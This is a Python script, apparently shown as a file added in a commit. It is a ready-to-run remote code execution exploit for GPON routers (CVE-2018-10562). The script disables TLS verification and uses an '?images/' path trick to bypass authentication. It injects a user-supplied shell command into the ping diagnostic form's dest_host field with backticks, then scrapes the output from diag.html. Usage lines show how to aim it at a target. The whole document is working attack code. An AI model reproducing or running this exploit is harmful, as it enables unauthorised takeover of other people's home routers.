1+ #!/usr/bin/env python
2+
3+ import sys
4+ import requests
5+ import time
6+ import urllib2
7+ import re
8+ import ssl
9+
10+ ctx = ssl .create_default_context ()
11+ ctx .check_hostname = False
12+ ctx .verify_mode = ssl .CERT_NONE
13+
14+
15+ def banner ():
16+ ascii_art = """
17+
18+ ________________________________________________________________
19+
20+ [*] GPON Remote Code Execution (CVE-2018-10562) [*]
21+ ________________________________________________________________
22+
23+ Coded by F3D
24+ Twitter: @f3d_0x0
25+ Medium: medium.com/@0xf3d
26+ ________________________________________________________________
27+
28+ """
29+ print ascii_art
30+
31+ def retrieve_results (target , command ):
32+ try :
33+ fp = urllib2 .urlopen (target + '/diag.html?images/' , context = ctx )
34+ for line in fp .readlines ():
35+ if 'diag_result = \" Can\' t resolv hostname for' in line :
36+ start = '['
37+ end = ';' + command + ']'
38+ res = str (line [line .find (start )+ len (start ):line .rfind (end )])
39+ return res .replace ('\\ n' , '\n ' )
40+ except Exception as e :
41+ print "[DEBUG] " + str (e ) + '\n '
42+ print "[*] An error occured while retriving the result"
43+
44+ def send_command (url_bypass , payload ):
45+ print "[*] Injecting command.."
46+ try :
47+ req = requests .Request ('POST' , url_bypass , data = payload )
48+ prepared = req .prepare ()
49+ s = requests .Session ()
50+ s .send (prepared )
51+ except Exception as e :
52+ pass
53+
54+
55+ if __name__ == "__main__" :
56+ try :
57+
58+ banner ()
59+
60+ domain = sys .argv [1 ]
61+ command = sys .argv [2 ]
62+
63+ url_bypass = domain + '/GponForm/diag_Form?images/'
64+ payload = 'XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`' + command + '`;' + command + '&ipv=0'
65+ send_command (url_bypass , payload )
66+ print "[*] Waiting for results..zZz.."
67+ time .sleep (3 )
68+ print "[*] Getting the results.."
69+ out = retrieve_results (domain , command )
70+ print ""
71+ print out
72+ print ""
73+
74+ except Exception as e :
75+ print "[DEBUG] " + str (e ) + '\n '
76+ print "[ERROR] Usage: python gpon_rce.py TARGET_URL COMMAND"
77+ print "[ERROR] e.g. : python gpon_rce.py http://192.168.1.15 \' id\' \n "
0 commit comments